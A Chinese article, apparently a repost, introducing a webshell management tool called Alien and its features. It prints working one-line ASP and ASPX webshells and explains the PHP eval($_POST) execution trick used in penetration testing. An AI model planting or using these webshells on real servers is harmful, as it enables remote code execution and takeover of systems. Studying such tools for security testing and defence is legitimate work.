介绍一款新的webshell管理工具
项目简介
语言
功能
File Manager (可显示图片, 可SearchFile)
虚拟终端
数据库
注册表
监控
截图
系统信息
项目描述
一句话木马
一句话木马是在渗透测试中用来控制服务器的工具
强大之处在于木马本身体积小,不易发现
以下是最简单的一句话木马
PHP
ASP <%execute(request("password"))%>
ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
关于JSP webshell目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎
shell有进行更改, 新增了可以显示图片的功能
关于NodeJS webshell
由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,
NodeJS目的重在管理而非渗透
伺服器
Windows, Linux, Unix, MacOS
Database管理
MySQL :PHP 交通
原理
以PHP为例子, eval()可以把string以PHP Code去执行,
如果eval()中带有可控变量,那么就可以执行任意代码。
如eval($_POST['a']);
HTTP POST a=phpinfo(); 就可以执行phpinfo();
注意!
工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除
目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西
图片
审核编辑:刘清
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
Linux系统
+关注
关注
4文章
590浏览量
27302 -
SQL
+关注
关注
1文章
753浏览量
44018 -
PHP
+关注
关注
0文章
452浏览量
26624 -
伺服器
+关注
关注
1文章
149浏览量
19426 -
Shell
+关注
关注
1文章
363浏览量
23252
原文标题:一款新的webshell管理工具
文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
登录管理工具LimitLogin
LimitLogin是一款于2005年面世的登录管理工具,由一名微软合作伙伴技术专家和一名应用程序开发顾问合力开发。LimitLogin旨在在Active Directory域中跟踪和
发表于 07-16 06:27
介绍一款苹果操作系统的电源管理工具
Power Manager for Mac是苹果操作系统上的一款笔记本电源管理工具,该工具支持苹果系列的笔记本,可以有效地优化苹果系统,结束不必要的系统任务,同时还可以提高笔记本电池的使用量
发表于 01-03 07:42
飞机驾驶舱(Cockpit)Web图像化服务器管理工具介绍
1、飞机驾驶舱(Cockpit)Web图像化服务器管理工具介绍云芯一号是极术社区发布的一款ARM微型服务器板卡,在“云芯一号”试用申请计划书
发表于 06-17 15:16
基于Web的集群管理工具CWMS
针对目前集群管理工具中没有实现单一入口或者仅提供命令行交互方式等问题,设计并实现了基于Web的集群管理工具CWMS。分析集群管理系统的体系结构,对集中式体系结构加以改进
发表于 04-15 09:29
•13次下载
目前接口管理工具有哪些_接口管理工具作用是什么
, 找到一款能够提高对接效率,录入接口信息的工具是非常有必要的。下面我将推荐几个文档管理工具并进行详细介绍。
发表于 01-04 16:00
•8589次阅读
Python之包管理工具快速入门
包管理是python这个Get的重要部分。本文介绍了Python的各个包管理工具之间的关系,相信通过这篇文章的介绍,就不会再对distutils、setuptools、distribu
常见MySQL数据库管理工具的介绍
最初MySQL本身没有提供非常方便的图形管理工具,日常的开发和维护均在类似DOS窗口中,用命令行进行数据库的操作。所以对于开发和测试同学来说,上手略微有点困难,增加了学习成本。
本文详细给出了几款常见MySQL数据库管理工具
如何安装Python包管理工具
第三方库,Python提供了一些强大的包管理工具。本文将介绍如何安装Python包管理工具,以便您能够在Python项目中方便地管理和使用第
开发几个简单功能用来管理webshell
管理工具,填写密码选择生成即可(这里小编推荐使用哥斯拉) JMG 工具介绍 jMG (Java Memshell Generator) 是一款支持高度自定义的 Java 内存马生成
一款任务日程管理工具ToDoList
1.软件介绍 2.软件功能 3 试用感受 推荐给大家一款开源免费的任务日程管理工具ToDoList,是适合职场人尤其是程序员的经典任务管理软件,使用好的话会让大家在工作中事半功倍。
Navicat和DBeaver的完美替代软件!推荐4款免费数据库管理工具
navicat替代工具推荐的四款免费数据库管理工具:NineData、HeidiSQL、DataGrip、phpMyAdmin。无论你是初学者还是专家,无论是轻盈易用还是功能强大,总有一款
工商网监
评论